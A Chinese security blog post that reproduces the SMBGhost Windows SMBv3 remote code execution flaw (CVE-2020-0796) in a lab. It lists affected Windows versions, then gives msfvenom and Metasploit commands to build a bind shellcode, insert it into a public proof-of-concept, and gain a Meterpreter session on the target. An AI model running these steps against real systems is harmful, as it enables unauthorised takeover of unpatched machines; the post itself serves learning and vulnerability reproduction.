「配枪朱丽叶。」 「配枪朱丽叶。」
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
    • 学习笔记
    • 工具分享
    • 漏洞复现
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
    • 学习笔记
    • 工具分享
    • 漏洞复现
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
我的主页 › 笔记 › CVE-2020-0796 微软SMBv3 协议RCE复现1 min read
#笔记#

CVE-2020-0796 微软SMBv3 协议RCE复现1 min read

9月前
102 2
内容 隐藏
0x00 漏洞描述
0x01 影响版本
0x02 漏洞复现

0x00 漏洞描述

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。

CVE-2020-0796 漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。

0x01 影响版本

  • 适用于32位系统的Windows 10版本1903
  • Windows 10 1903版(用于基于x64的系统)
  • Windows 10 1903版(用于基于ARM64的系统)
  • Windows Server 1903版(服务器核心安装)
  • 适用于32位系统的Windows 10版本1909
  • Windows 10版本1909(用于基于x64的系统)
  • Windows 10 1909版(用于基于ARM64的系统)
  • Windows Server版本1909(服务器核心安装)

0x02 漏洞复现

攻击机IP:192.168.58.134

目标机IP:192.168.58.143

首先下载EXP:

https://github.com/chompie1337/SMBGhost_RCE_PoC

启动msf,使用msf生成shellcode:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

在当前目录生成了一个shellcode.txt:

将其替换之前下载好的SMBGhost_RCE_PoC文件夹中的exploit.py的USER_PAYLOAD:

使用Kali中的msf设置参数,开启监听:

  • msf5 > use exploit/multi/handler
  • msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
  • msf5 exploit(multi/handler) > set rhost 192.168.58.143#设置目标靶机IP地址
  • msf5 exploit(multi/handler) > set lport 3333 #设置监听端口
  • msf5 exploit(multi/handler) > exploit

在Kali中进入SMBGhost_RCE_PoC文件夹,执行exploit.py文件:

python3 exploit.py ­-ip 192.168.58.143

我们已经取得了目标机的Meterpreter会话。简单提权:

2 0
Shaw Root
# 漏洞复现# 笔记
相关文章
[Vulhub]CVE-2017-12635/12636 CouchDB 垂直权限绕过/任意命令执行漏洞复现
[Vulnhub]GoldenEye: 1靶机通关记录
[Durandal’s Backdoor]nc替代工具
CVE-2021-3156 sudo 本地提权漏洞复现
从0开始的JAVA学习笔记
头像
Shaw Root站长
> 生活温暖顺心 其他别无他求。
144文章 0评论 128获赞
随便看看:)
[BSidesCF 2020]Had a bad day
11月前
[GYCTF2020]Ezsqli
4月前
DEFCON_BypassWAF学习笔记
9月前
[虎符网络安全赛道]easy_login
11月前
[Durandal’s Backdoor]nc替代工具
4周前
  • 旧站
  • 我的知乎
  • Riro
  • 7i4n2h3n9
  • EDS
  • 熵增
  • 紫哥purplet
  • 夏风
  • N0vice
  • Ga1@xy
  • prontosil
  • FzWjScJ
  • Retr_0
  • L1near
  • 1p0ch
  • β-AS
  • Match
  • Dizzyk
  • Y1ng
  • 偏有宸机
  • Van1sh
  • Fstone
  • Kali’s Blog
  • Airtail
  • False
  • 魔法少女雪殇
Copyright © 2020-2021 「配枪朱丽叶。」. Designed by nicetheme. 百度统计 载入天数... 载入时分秒...